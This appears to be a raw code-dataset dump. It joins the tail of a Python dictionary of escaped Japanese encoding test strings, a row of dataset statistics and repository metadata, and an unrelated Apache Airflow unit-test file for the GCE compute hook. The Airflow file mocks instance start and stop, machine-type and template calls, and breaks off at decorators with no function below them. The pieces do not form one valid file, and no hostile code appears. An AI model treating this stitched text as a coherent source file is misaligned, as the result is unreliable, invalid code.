"\xe3\x81\xa3\xe3\x81\x9f\xe5\xb0\x8f\xe7\xb4\xb0\xe5\xb7\xa5\xe3"
"\x81\x8c\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x95\xe3\x82\x8c\xe3\x82"
"\x8b\xe3\x81\x93\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\x82\xe3\x81\xbe"
"\xe3\x82\x8a\xe3\x81\x82\xe3\x82\x8a\xe3\x81\xbe\xe3\x81\x9b\xe3"
"\x82\x93\xe3\x80\x82\x0a\xe8\xa8\x80\xe8\xaa\x9e\xe8\x87\xaa\xe4"
"\xbd\x93\xe3\x81\xae\xe6\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x9c"
"\x80\xe5\xb0\x8f\xe9\x99\x90\xe3\x81\xab\xe6\x8a\xbc\xe3\x81\x95"
"\xe3\x81\x88\xe3\x80\x81\xe5\xbf\x85\xe8\xa6\x81\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x8b\xa1\xe5\xbc\xb5\xe3\x83"
"\xa2\xe3\x82\xb8\xe3\x83\xa5\xe3\x83\xbc\xe3\x83\xab\xe3\x81\xa8"
"\xe3\x81\x97\xe3\x81\xa6\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x99\xe3"
"\x82\x8b\xe3\x80\x81\xe3\x81\xa8\xe3\x81\x84\xe3\x81\x86\xe3\x81"
"\xae\xe3\x81\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe3"
"\x83\x9d\xe3\x83\xaa\xe3\x82\xb7\xe3\x83\xbc\xe3\x81\xa7\xe3\x81"
"\x99\xe3\x80\x82\x0a\x0a"),
'shift_jisx0213': (
"\x50\x79\x74\x68\x6f\x6e\x20\x82\xcc\x8a\x4a\x94\xad\x82\xcd\x81"
"\x41\x31\x39\x39\x30\x20\x94\x4e\x82\xb2\x82\xeb\x82\xa9\x82\xe7"
"\x8a\x4a\x8e\x6e\x82\xb3\x82\xea\x82\xc4\x82\xa2\x82\xdc\x82\xb7"
"\x81\x42\x0a\x8a\x4a\x94\xad\x8e\xd2\x82\xcc\x20\x47\x75\x69\x64"
"\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73\x73\x75\x6d\x20\x82\xcd\x8b"
"\xb3\x88\xe7\x97\x70\x82\xcc\x83\x76\x83\x8d\x83\x4f\x83\x89\x83"
"\x7e\x83\x93\x83\x4f\x8c\xbe\x8c\xea\x81\x75\x41\x42\x43\x81\x76"
"\x82\xcc\x8a\x4a\x94\xad\x82\xc9\x8e\x51\x89\xc1\x82\xb5\x82\xc4"
"\x82\xa2\x82\xdc\x82\xb5\x82\xbd\x82\xaa\x81\x41\x41\x42\x43\x20"
"\x82\xcd\x8e\xc0\x97\x70\x8f\xe3\x82\xcc\x96\xda\x93\x49\x82\xc9"
"\x82\xcd\x82\xa0\x82\xdc\x82\xe8\x93\x4b\x82\xb5\x82\xc4\x82\xa2"
"\x82\xdc\x82\xb9\x82\xf1\x82\xc5\x82\xb5\x82\xbd\x81\x42\x0a\x82"
"\xb1\x82\xcc\x82\xbd\x82\xdf\x81\x41\x47\x75\x69\x64\x6f\x20\x82"
"\xcd\x82\xe6\x82\xe8\x8e\xc0\x97\x70\x93\x49\x82\xc8\x83\x76\x83"
"\x8d\x83\x4f\x83\x89\x83\x7e\x83\x93\x83\x4f\x8c\xbe\x8c\xea\x82"
"\xcc\x8a\x4a\x94\xad\x82\xf0\x8a\x4a\x8e\x6e\x82\xb5\x81\x41\x89"
"\x70\x8d\x91\x20\x42\x42\x53\x20\x95\xfa\x91\x97\x82\xcc\x83\x52"
"\x83\x81\x83\x66\x83\x42\x94\xd4\x91\x67\x81\x75\x83\x82\x83\x93"
"\x83\x65\x83\x42\x20\x83\x70\x83\x43\x83\x5c\x83\x93\x81\x76\x82"
"\xcc\x83\x74\x83\x40\x83\x93\x82\xc5\x82\xa0\x82\xe9\x20\x47\x75"
"\x69\x64\x6f\x20\x82\xcd\x82\xb1\x82\xcc\x8c\xbe\x8c\xea\x82\xf0"
"\x81\x75\x50\x79\x74\x68\x6f\x6e\x81\x76\x82\xc6\x96\xbc\x82\xc3"
"\x82\xaf\x82\xdc\x82\xb5\x82\xbd\x81\x42\x0a\x82\xb1\x82\xcc\x82"
"\xe6\x82\xa4\x82\xc8\x94\x77\x8c\x69\x82\xa9\x82\xe7\x90\xb6\x82"
"\xdc\x82\xea\x82\xbd\x20\x50\x79\x74\x68\x6f\x6e\x20\x82\xcc\x8c"
"\xbe\x8c\xea\x90\xdd\x8c\x76\x82\xcd\x81\x41\x81\x75\x83\x56\x83"
"\x93\x83\x76\x83\x8b\x81\x76\x82\xc5\x81\x75\x8f\x4b\x93\xbe\x82"
"\xaa\x97\x65\x88\xd5\x81\x76\x82\xc6\x82\xa2\x82\xa4\x96\xda\x95"
"\x57\x82\xc9\x8f\x64\x93\x5f\x82\xaa\x92\x75\x82\xa9\x82\xea\x82"
"\xc4\x82\xa2\x82\xdc\x82\xb7\x81\x42\x0a\x91\xbd\x82\xad\x82\xcc"
"\x83\x58\x83\x4e\x83\x8a\x83\x76\x83\x67\x8c\x6e\x8c\xbe\x8c\xea"
"\x82\xc5\x82\xcd\x83\x86\x81\x5b\x83\x55\x82\xcc\x96\xda\x90\xe6"
"\x82\xcc\x97\x98\x95\xd6\x90\xab\x82\xf0\x97\x44\x90\xe6\x82\xb5"
"\x82\xc4\x90\x46\x81\x58\x82\xc8\x8b\x40\x94\x5c\x82\xf0\x8c\xbe"
"\x8c\xea\x97\x76\x91\x66\x82\xc6\x82\xb5\x82\xc4\x8e\xe6\x82\xe8"
"\x93\xfc\x82\xea\x82\xe9\x8f\xea\x8d\x87\x82\xaa\x91\xbd\x82\xa2"
"\x82\xcc\x82\xc5\x82\xb7\x82\xaa\x81\x41\x50\x79\x74\x68\x6f\x6e"
"\x20\x82\xc5\x82\xcd\x82\xbb\x82\xa4\x82\xa2\x82\xc1\x82\xbd\x8f"
"\xac\x8d\xd7\x8d\x48\x82\xaa\x92\xc7\x89\xc1\x82\xb3\x82\xea\x82"
"\xe9\x82\xb1\x82\xc6\x82\xcd\x82\xa0\x82\xdc\x82\xe8\x82\xa0\x82"
"\xe8\x82\xdc\x82\xb9\x82\xf1\x81\x42\x0a\x8c\xbe\x8c\xea\x8e\xa9"
"\x91\xcc\x82\xcc\x8b\x40\x94\x5c\x82\xcd\x8d\xc5\x8f\xac\x8c\xc0"
"\x82\xc9\x89\x9f\x82\xb3\x82\xa6\x81\x41\x95\x4b\x97\x76\x82\xc8"
"\x8b\x40\x94\x5c\x82\xcd\x8a\x67\x92\xa3\x83\x82\x83\x57\x83\x85"
"\x81\x5b\x83\x8b\x82\xc6\x82\xb5\x82\xc4\x92\xc7\x89\xc1\x82\xb7"
"\x82\xe9\x81\x41\x82\xc6\x82\xa2\x82\xa4\x82\xcc\x82\xaa\x20\x50"
"\x79\x74\x68\x6f\x6e\x20\x82\xcc\x83\x7c\x83\x8a\x83\x56\x81\x5b"
"\x82\xc5\x82\xb7\x81\x42\x0a\x0a\x83\x6d\x82\xf5\x20\x83\x9e\x20"
"\x83\x67\x83\x4c\x88\x4b\x88\x79\x20\x98\x83\xfc\xd6\x20\xfc\xd2"
"\xfc\xe6\xfb\xd4\x0a",
"\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xaf\xe3\x80\x81\x31\x39\x39\x30\x20\xe5\xb9\xb4\xe3\x81"
"\x94\xe3\x82\x8d\xe3\x81\x8b\xe3\x82\x89\xe9\x96\x8b\xe5\xa7\x8b"
"\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3"
"\x81\x99\xe3\x80\x82\x0a\xe9\x96\x8b\xe7\x99\xba\xe8\x80\x85\xe3"
"\x81\xae\x20\x47\x75\x69\x64\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73"
"\x73\x75\x6d\x20\xe3\x81\xaf\xe6\x95\x99\xe8\x82\xb2\xe7\x94\xa8"
"\xe3\x81\xae\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83\xa9\xe3"
"\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e\xe3\x80"
"\x8c\x41\x42\x43\xe3\x80\x8d\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xab\xe5\x8f\x82\xe5\x8a\xa0\xe3\x81\x97\xe3\x81\xa6\xe3"
"\x81\x84\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x81\x8c\xe3\x80"
"\x81\x41\x42\x43\x20\xe3\x81\xaf\xe5\xae\x9f\xe7\x94\xa8\xe4\xb8"
"\x8a\xe3\x81\xae\xe7\x9b\xae\xe7\x9a\x84\xe3\x81\xab\xe3\x81\xaf"
"\xe3\x81\x82\xe3\x81\xbe\xe3\x82\x8a\xe9\x81\xa9\xe3\x81\x97\xe3"
"\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x81"
"\xa7\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a\xe3\x81\x93\xe3\x81"
"\xae\xe3\x81\x9f\xe3\x82\x81\xe3\x80\x81\x47\x75\x69\x64\x6f\x20"
"\xe3\x81\xaf\xe3\x82\x88\xe3\x82\x8a\xe5\xae\x9f\xe7\x94\xa8\xe7"
"\x9a\x84\xe3\x81\xaa\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83"
"\xa9\xe3\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e"
"\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba\xe3\x82\x92\xe9\x96\x8b\xe5"
"\xa7\x8b\xe3\x81\x97\xe3\x80\x81\xe8\x8b\xb1\xe5\x9b\xbd\x20\x42"
"\x42\x53\x20\xe6\x94\xbe\xe9\x80\x81\xe3\x81\xae\xe3\x82\xb3\xe3"
"\x83\xa1\xe3\x83\x87\xe3\x82\xa3\xe7\x95\xaa\xe7\xb5\x84\xe3\x80"
"\x8c\xe3\x83\xa2\xe3\x83\xb3\xe3\x83\x86\xe3\x82\xa3\x20\xe3\x83"
"\x91\xe3\x82\xa4\xe3\x82\xbd\xe3\x83\xb3\xe3\x80\x8d\xe3\x81\xae"
"\xe3\x83\x95\xe3\x82\xa1\xe3\x83\xb3\xe3\x81\xa7\xe3\x81\x82\xe3"
"\x82\x8b\x20\x47\x75\x69\x64\x6f\x20\xe3\x81\xaf\xe3\x81\x93\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe3\x82\x92\xe3\x80\x8c\x50\x79"
"\x74\x68\x6f\x6e\xe3\x80\x8d\xe3\x81\xa8\xe5\x90\x8d\xe3\x81\xa5"
"\xe3\x81\x91\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a"
"\xe3\x81\x93\xe3\x81\xae\xe3\x82\x88\xe3\x81\x86\xe3\x81\xaa\xe8"
"\x83\x8c\xe6\x99\xaf\xe3\x81\x8b\xe3\x82\x89\xe7\x94\x9f\xe3\x81"
"\xbe\xe3\x82\x8c\xe3\x81\x9f\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa8\xad\xe8\xa8\x88\xe3\x81"
"\xaf\xe3\x80\x81\xe3\x80\x8c\xe3\x82\xb7\xe3\x83\xb3\xe3\x83\x97"
"\xe3\x83\xab\xe3\x80\x8d\xe3\x81\xa7\xe3\x80\x8c\xe7\xbf\x92\xe5"
"\xbe\x97\xe3\x81\x8c\xe5\xae\xb9\xe6\x98\x93\xe3\x80\x8d\xe3\x81"
"\xa8\xe3\x81\x84\xe3\x81\x86\xe7\x9b\xae\xe6\xa8\x99\xe3\x81\xab"
"\xe9\x87\x8d\xe7\x82\xb9\xe3\x81\x8c\xe7\xbd\xae\xe3\x81\x8b\xe3"
"\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80"
"\x82\x0a\xe5\xa4\x9a\xe3\x81\x8f\xe3\x81\xae\xe3\x82\xb9\xe3\x82"
"\xaf\xe3\x83\xaa\xe3\x83\x97\xe3\x83\x88\xe7\xb3\xbb\xe8\xa8\x80"
"\xe8\xaa\x9e\xe3\x81\xa7\xe3\x81\xaf\xe3\x83\xa6\xe3\x83\xbc\xe3"
"\x82\xb6\xe3\x81\xae\xe7\x9b\xae\xe5\x85\x88\xe3\x81\xae\xe5\x88"
"\xa9\xe4\xbe\xbf\xe6\x80\xa7\xe3\x82\x92\xe5\x84\xaa\xe5\x85\x88"
"\xe3\x81\x97\xe3\x81\xa6\xe8\x89\xb2\xe3\x80\x85\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x82\x92\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa6"
"\x81\xe7\xb4\xa0\xe3\x81\xa8\xe3\x81\x97\xe3\x81\xa6\xe5\x8f\x96"
"\xe3\x82\x8a\xe5\x85\xa5\xe3\x82\x8c\xe3\x82\x8b\xe5\xa0\xb4\xe5"
"\x90\x88\xe3\x81\x8c\xe5\xa4\x9a\xe3\x81\x84\xe3\x81\xae\xe3\x81"
"\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\x50\x79\x74\x68\x6f\x6e"
"\x20\xe3\x81\xa7\xe3\x81\xaf\xe3\x81\x9d\xe3\x81\x86\xe3\x81\x84"
"\xe3\x81\xa3\xe3\x81\x9f\xe5\xb0\x8f\xe7\xb4\xb0\xe5\xb7\xa5\xe3"
"\x81\x8c\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x95\xe3\x82\x8c\xe3\x82"
"\x8b\xe3\x81\x93\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\x82\xe3\x81\xbe"
"\xe3\x82\x8a\xe3\x81\x82\xe3\x82\x8a\xe3\x81\xbe\xe3\x81\x9b\xe3"
"\x82\x93\xe3\x80\x82\x0a\xe8\xa8\x80\xe8\xaa\x9e\xe8\x87\xaa\xe4"
"\xbd\x93\xe3\x81\xae\xe6\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x9c"
"\x80\xe5\xb0\x8f\xe9\x99\x90\xe3\x81\xab\xe6\x8a\xbc\xe3\x81\x95"
"\xe3\x81\x88\xe3\x80\x81\xe5\xbf\x85\xe8\xa6\x81\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x8b\xa1\xe5\xbc\xb5\xe3\x83"
"\xa2\xe3\x82\xb8\xe3\x83\xa5\xe3\x83\xbc\xe3\x83\xab\xe3\x81\xa8"
"\xe3\x81\x97\xe3\x81\xa6\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x99\xe3"
"\x82\x8b\xe3\x80\x81\xe3\x81\xa8\xe3\x81\x84\xe3\x81\x86\xe3\x81"
"\xae\xe3\x81\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe3"
"\x83\x9d\xe3\x83\xaa\xe3\x82\xb7\xe3\x83\xbc\xe3\x81\xa7\xe3\x81"
"\x99\xe3\x80\x82\x0a\x0a\xe3\x83\x8e\xe3\x81\x8b\xe3\x82\x9a\x20"
"\xe3\x83\x88\xe3\x82\x9a\x20\xe3\x83\x88\xe3\x82\xad\xef\xa8\xb6"
"\xef\xa8\xb9\x20\xf0\xa1\x9a\xb4\xf0\xaa\x8e\x8c\x20\xe9\xba\x80"
"\xe9\xbd\x81\xf0\xa9\x9b\xb0\x0a"),
}
| 65.562745 | 68 | 0.715256 | 15,930 | 66,874 | 3.002323 | 0.013748 | 0.065486 | 0.014302 | 0.01656 | 0.896377 | 0.891296 | 0.882702 | 0.879691 | 0.873774 | 0.870387 | 0 | 0.281405 | 0.015447 | 66,874 | 1,019 | 69 | 65.627085 | 0.444996 | 0 | 0 | 0.791953 | 0 | 0.968597 | 0.953046 | 0.950624 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
316ac1eced4da8e44f47942984ca4a75f48c8630 | 36,428 | py | Python | tests/gcp/hooks/test_gcp_compute_hook.py | barseghyanartur/airflow | 16b8381dc87bb8c323412aa48b0d51b8a31479c1 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | tests/gcp/hooks/test_gcp_compute_hook.py | barseghyanartur/airflow | 16b8381dc87bb8c323412aa48b0d51b8a31479c1 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | tests/gcp/hooks/test_gcp_compute_hook.py | barseghyanartur/airflow | 16b8381dc87bb8c323412aa48b0d51b8a31479c1 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
import unittest
from tests.contrib.utils.base_gcp_mock import mock_base_gcp_hook_no_default_project_id, \
mock_base_gcp_hook_default_project_id, GCP_PROJECT_ID_HOOK_UNIT_TEST
from tests.compat import mock, PropertyMock
from airflow import AirflowException
from airflow.gcp.hooks.compute import GceHook, GceOperationStatus
GCE_ZONE = 'zone'
GCE_INSTANCE = 'instance'
GCE_INSTANCE_TEMPLATE = 'instance-template'
GCE_REQUEST_ID = 'request_id'
GCE_INSTANCE_GROUP_MANAGER = 'instance_group_manager'
class TestGcpComputeHookNoDefaultProjectId(unittest.TestCase):
def setUp(self):
with mock.patch('airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.__init__',
new=mock_base_gcp_hook_no_default_project_id):
self.gce_hook_no_project_id = GceHook(gcp_conn_id='test')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_start_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.start_instance(
project_id='example-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
start_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch(
'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_start_instance_no_project_id(self, wait_for_operation_to_complete, get_conn, mock_project_id):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
with self.assertRaises(AirflowException) as cm:
self.gce_hook_no_project_id.start_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
start_method.assert_not_called()
execute_method.assert_not_called()
err = cm.exception
self.assertIn("The project id must be passed", str(err))
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_stop_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.stop_instance(
project_id='example-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
stop_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch(
'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_stop_instance_no_project_id(self, wait_for_operation_to_complete, get_conn, mock_project_id):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
with self.assertRaises(AirflowException) as cm:
self.gce_hook_no_project_id.stop_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
stop_method.assert_not_called()
execute_method.assert_not_called()
err = cm.exception
self.assertIn("The project id must be passed", str(err))
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_set_machine_type_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
set_machine_type_method = get_conn.return_value.instances.return_value.setMachineType
execute_method = set_machine_type_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.set_machine_type(
body={},
project_id='example-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
set_machine_type_method.assert_called_once_with(body={}, instance='instance',
project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch(
'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_set_machine_type_no_project_id(self, wait_for_operation_to_complete, get_conn, mock_project_id):
set_machine_type_method = get_conn.return_value.instances.return_value.setMachineType
execute_method = set_machine_type_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
with self.assertRaises(AirflowException) as cm:
self.gce_hook_no_project_id.set_machine_type(
body={},
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
set_machine_type_method.assert_not_called()
execute_method.assert_not_called()
err = cm.exception
self.assertIn("The project id must be passed", str(err))
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.get_instance_template(
resource_id=GCE_INSTANCE_TEMPLATE,
project_id='example-project'
)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceTemplate='instance-template', project='example-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch(
'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_template_no_project_id(
self, wait_for_operation_to_complete, get_conn, mock_project_id
):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
with self.assertRaises(AirflowException) as cm:
self.gce_hook_no_project_id.get_instance_template(
resource_id=GCE_INSTANCE_TEMPLATE
)
get_method.assert_not_called()
execute_method.assert_not_called()
err = cm.exception
self.assertIn("The project id must be passed", str(err))
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_insert_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.insert_instance_template(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
insert_method.assert_called_once_with(body={}, project='example-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id')
@mock.patch(
'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_insert_instance_template_no_project_id(
self, wait_for_operation_to_complete, get_conn, mock_project_id
):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
with self.assertRaises(AirflowException) as cm:
self.gce_hook_no_project_id.insert_instance_template(
body={},
request_id=GCE_REQUEST_ID
)
insert_method.assert_not_called()
execute_method.assert_not_called()
err = cm.exception
self.assertIn("The project id must be passed", str(err))
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_group_manager_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.get_instance_group_manager(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER
)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceGroupManager='instance_group_manager',
project='example-project',
zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch(
'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_group_manager_no_project_id(
self, wait_for_operation_to_complete, get_conn, mock_project_id
):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
with self.assertRaises(AirflowException) as cm:
self.gce_hook_no_project_id.get_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER
)
get_method.assert_not_called()
execute_method.assert_not_called()
err = cm.exception
self.assertIn("The project id must be passed", str(err))
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_patch_instance_group_manager_overridden_project_id(self,
wait_for_operation_to_complete, get_conn):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook_no_project_id.patch_instance_group_manager(
project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='example-project',
requestId='request_id',
zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(operation_name='operation_id',
project_id='example-project',
zone='zone')
@mock.patch(
'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
